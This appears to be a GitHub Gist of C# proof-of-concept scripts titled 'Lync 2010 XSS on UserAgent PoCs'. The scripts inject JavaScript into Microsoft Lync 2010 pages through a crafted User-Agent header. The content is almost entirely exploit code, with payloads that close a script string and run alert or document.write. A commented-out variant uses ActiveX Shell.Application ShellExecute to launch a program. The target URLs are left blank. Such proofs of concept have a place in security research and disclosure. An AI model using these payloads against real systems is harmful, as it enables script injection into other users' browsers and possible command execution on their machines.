Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Lync 2010 XSS on UserAgent PoCs
var topPanel = panel.add_Panel(true);
WebClient client = new WebClient ();
Action<string> sendRequest =
client.Headers.Add ("user-agent",payload);
var codeViewer = topPanel.add_SourceCodeViewer();
var url = "";
var stream = client.OpenRead(url);
var reader = new StreamReader(stream);
var html = reader.ReadToEnd();
stream.Close ();
reader.Close ();
sendRequest("XSS; \"; \r\n alert('xss'); // diagInfo = \"");
return client;
//using System.IO
//using System.Net
var topPanel = panel.add_Panel(true);
var browser = topPanel.add_WebBrowser();
var payload = "Custom USER AGENT;";
payload += " \"; document.write('<h1>xss</h2>'); //";
browser.Navigate("", null, null, b"User-Agent: " + payload);
return browser.get_Html();
// from
// in most normal IE configs, the PoC below will throw permission denied
//payload += "var oShell = new ActiveXObject(\"Shell.Application\");oShell.ShellExecute(\"\",\"\",\"\",\"open\",\"1\"); //";
//var ie = "ie_inMKo_".o2Cache<WatiN_IE>(()=> panel.clear().add_IE()).silent(true); // ie randon value for o2cache makes this object to unique amongst multiple instances of this control
var ie = panel.clear().add_IE();
var payload = " \"; document.write('<h1>xss</h2>'); //";
ie.WebBrowser.Navigate("", null, null,
"User-Agent: " + payload);
return ie.IE.Html;
//using FluentSharp.Watin;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.